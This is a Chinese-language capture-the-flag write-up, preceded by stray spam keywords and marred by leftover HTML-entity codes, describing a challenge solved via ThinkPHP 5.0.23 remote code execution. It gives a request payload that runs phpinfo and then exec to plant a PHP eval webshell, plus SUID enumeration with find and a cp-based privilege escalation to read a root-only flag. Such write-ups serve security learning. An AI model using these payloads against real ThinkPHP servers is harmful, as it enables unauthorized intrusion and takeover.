福州自助建设网站,网站渗透案例,超级外链吧,wordpress免费模版前言:比赛是结束了#xff0c;但我的学习还未结束#xff0c;看看自己能复习几道题吧#xff0c;第四周实在太难
Final
考点#xff1a; ThinkPHP 5.0.23 RCE一句话木马上传SUID提权#xff08;find#xff09; 解题:
首先页面就给了ThinkPHP V5#xff0c; 那无非考… 前言:比赛是结束了但我的学习还未结束看看自己能复习几道题吧第四周实在太难
Final
考点 ThinkPHP 5.0.23 RCE一句话木马上传SUID提权find 解题:
首先页面就给了ThinkPHP V5 那无非考的就是ThinkPHP版本的漏洞 经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解
https://blog.csdn.net/Lucky1youzi/article/details/128740552
我们按照他说的做首先抓包进行传参
GET:index.php?scaptcha
POST:_method__constructfilter[]phpinfomethodgetserver[REQUEST_METHOD]1 这个参数1 是可以进行修改的竟然能出现phpinfo页面 那我们就可以进行RCE但是我们发现命令执行参数全被ban了可能是权限的问题 我们上传一句话木马
_method__constructfilter[]execmethodgetserver[REQUEST_METHOD]echo%20?php%20eval($_POST[cmd]);?%20%20/var/www/public/1.php
然后蚁剑连接后发现根目录下存在flag文件 但是里面内容没有 一眼没权限我们去终端看看 我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读 尝试chmod无果
然后我们这里就查看具有SUID权限的命令
find / -user root -perm -4000 -print 2/dev/null
这个利用find进行提权可以访问
https://blog.csdn.net/rlenew/article/details/111873682 我们使用cp命令SUID提权读取Flag
cp /flag_dd3f6380aa0d /dev/stdout / dev / stdout是—个特殊的文件代表标准输出。